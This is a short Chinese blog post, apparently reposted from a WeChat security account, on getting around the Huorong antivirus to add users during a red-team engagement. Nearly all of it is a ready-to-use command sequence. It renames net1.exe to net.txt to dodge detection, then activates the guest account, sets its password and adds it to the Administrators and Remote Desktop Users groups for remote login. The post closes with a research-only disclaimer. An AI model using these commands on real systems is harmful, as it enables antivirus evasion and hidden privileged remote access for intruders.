在一次攻防中遇到火绒无法正常添加用户情况,于是利用一个小套路成功远程连接。
虚拟机测试:正常添加用户会报毒
虚拟机测试 使用如下命令成功添加用户,但实战中添加失败。于是尝试使用组合套路。
copy net1.exe net.txt
net.txt user admin 123 /add
net user guest /active:yes
net user guest Aa123456.
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
实战使用:
copy net1.exe net.txt
net.txt user guest /active:yes
net.txt user guest 123
net.txt localgroup administrators guest /add
net.txt localgroup "Remote Desktop Users" guest /add
没用报毒,成功激活guest用户连接。
后续成功远程连接后,也是在此机器的远程连接机器中获取了更多信息。
原文始发于微信公众号(零威胁):绕过杀软添加用户
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论